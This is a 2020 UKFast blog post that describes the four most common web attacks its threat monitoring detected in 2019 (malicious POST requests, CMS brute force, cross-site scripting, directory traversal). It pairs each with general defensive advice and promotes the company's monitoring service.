Most Common Cyber-Attacks of 2019 Explained

8 January 2020 by UKFast

Over the course of 2019, UKFast’s Threat Monitoring service detected and responded to more than 33 million cyber-attacks across our clients’ networks. Using this wealth of data, we were able to identify the four most common cyber-attack vectors used by criminals in 2019 to target UK businesses.

Here are your four most notorious cyber-attacks of 2019, how they work and what you can do about them in 2020 to protect your business.

1. Malicious POST requests 
2. CMS brute-force attempts
3. Cross site scripting
4. Directory traversal attempts

1.      Malicious POST requests

Number of cyber-attacks detected in 2019:  4.3 million

How does it work?

In general, POST requests send data to your server. Whenever you leave a comment, post a tweet, share content or fill out a contact form on a website, you’re sending your content and the data that comes with it to the server as a POST request. This is normal and just an expected part of how the web works. So, what’s the issue?

For your typical server, there is no limit to how many POST requests it can receive. This means that threat actors can flood your server with POST requests at any given moment, bombarding your infrastructure with huge amounts of data and eating into server resources and bandwidth.  While your server may be able to handle a constant stream of malicious POST requests without too much distress at first, the cumulative effect of these requests is a seriously strained server struggling to function with diminished resources.

As well as slowing down your server’s response, or even crashing it entirely, often threat actors use these cyber-attacks to highlight further server vulnerabilities which they can exploit.

What can you do?

• Monitor: Monitor POST requests and ensure your monitoring scripts allow you to see the actual content of the request, so you can determine if it is indeed malicious.
• Detect: Detecting POST requests requires a simple log search for the word POST and noting the type, URL and HTTP protocol of the request. These three aspects of the log data make it possible to identify a malicious POST request, though log files do vary depending on your server configuration.
• Block: After a period of monitoring, form a strategy for which POST requests are valid or accepted on your site and implement a ruleset which blocks invalid requests while ensuring valid requests make it to your server.

2.      CMS Brute-Force Attempts

Number of cyber-attacks detected in 2019:  725,435

How does it work?

In a brute-force attempt, an attacker uses combinations of usernames and passwords, possibly obtained from a list of stolen credentials or through a phishing campaign targeting employees within your organisation. As the name suggests, the attacker attempts to force their way into your CMS, hammering your login page with combinations of usernames and passwords until one is accepted.

The sole aim of this cyber-attack is to gain access to your account – or, in this particular case, access to your CMS – in order to leverage control over your systems, steal your data or carry out further attacks from inside your network. More than 700,000 brute-force attempts on content management systems (CMS) were detected by UKFast Threat Monitoring in 2019, with WordPress and Joomla identified as the most common systems targeted.

What can you do?

Brute-force cyber-attacks are simple in nature and there are some quick wins to be had:

• Ensure that all default credentials (both usernames AND passwords) have been changed across your whole network. This is one of the easiest ways for hackers gain access to your accounts but a basic security measure many of us forget – this includes your Wi-Fi password!
• Invest in an Intrusion Detection or Intrusion Prevention service (like threat monitoring). Threat monitoring spots any suspicious activity including, for instance, someone trying many different combinations of username and password. The threat monitoring software blocks the IP address, dramatically reducing the chances of a successful brute force hack.

3.      Cross-Site Scripting Attempts

Number of cyber-attacks detected in 2019:  699,817

How does it work?

Cross-site scripting (XSS) is a form of web vulnerability, and the name of a client-side attack. Hackers inject and run malicious script into a legitimate web page, which allows them to compromise the interactions that users have with a vulnerable application. Any malicious code on the targeted site is trusted by users because it appears to have come from the legitimate source.

XSS allows the attacker to use the trusted web page server to send malicious data, steal cookies containing sensitive information, and monitor the activity of unsuspecting application users.  This can lead to data breaches or even complete control over the application if the information stolen contains credentials used to access admin privileges.

What can you do?

Cross-site scripting (XSS) was labelled as one of the most widely-used attack methods of 2019. And with a large proportion of our workloads and revenue now dependent on web-based applications, defence against web-based attacks is paramount. XSS attacks can be mitigated by using a variety of measures in tandem:

• Use a web application firewall (WAF) to monitor, detect and prevent web-based attacks by filtering your app’s traffic. WAF rulesets can also be custom-built to block certain malicious code that would constitute towards an XSS.
• Employing reputable developers and performing regular review of application code
• Perform regular vulnerability scans (threat monitoring can help detect issues within your web applications)

4.      Directory Traversal Attempts

Number of cyber-attacks detected in 2019:  586,042

How does it work?

Directory traversal, also known as file path traversal, is a web security vulnerability which allows an attacker to access restricted directories and read files on an application’s server.

For example, take a page on your website which displays an image. This image will have an associated URL and to load the content of the image file the application appends the requested filename to a base directory then uses a filesystem API to read the contents of the file. In some cases, this inputting of URLs to request files from your server is unprotected and so attackers are able to input their own URLs which request an arbitrary file from your server’s filesystem. This is done by using sequences and other techniques designed to bypass the levels of a directory’s structure, ultimately giving access the root filesystem.  Since all your other file systems are mounted upon your root filesystem, from here the hacker can modify application data or behaviour and ultimately take full control of your server.

Files affected include application code and data, credentials for back-end systems, and sensitive OS files. Directory traversal is usually carried out with the intent to gain control over your server, steal your business-critical data and cause a data breach.

What can you do?

The most effective way to prevent directory traversal vulnerabilities is to avoid passing user-supplied input to filesystem APIs altogether, often circumvented by rewriting application functions.

If passing user-supplied input to filesystem APIs if unavoidable, then two layers of defence should be used together to prevent attacks:

• Employing effective file permissions: audit file permissions to ensure access is restricted to authorised locations
• Your application should validate the user input before processing it, comparing against an allow list of permitted values. If that isn’t possible for the required functionality, then the validation should verify that the input contains only permitted content, such as purely alphanumeric characters (a WAF can help with this)
• After validating the supplied input, the application should append the input to the base directory and standardise the path. It should verify that the standardised path starts with the expected base directory.

Putting the right security in place

To avoid potential downtime, slow site speeds and data breaches, defending against these four common cyber-threats is essential. But we understand that for many businesses, the process of monitoring, detecting and responding can be time-consuming and inconvenient.

That’s why, as well as monitoring, detecting and blocking cyber-threats in action, UKFast Threat Monitoring:

• Determines the correct rulesets and file permissions to defend against a variety of threats like malicious POST requests and directory traversal
• Assists with the management of WAF rulesets
• Automatically blocks brute force attempts at the source
• Provides the option to include Threat Response – employing a team of security experts to respond to threats on your network directly

Join the hundreds of businesses already taking advantage of UKFast’s Threat Vision service and ensure you’re protected against the biggest cyber-threats in 2020.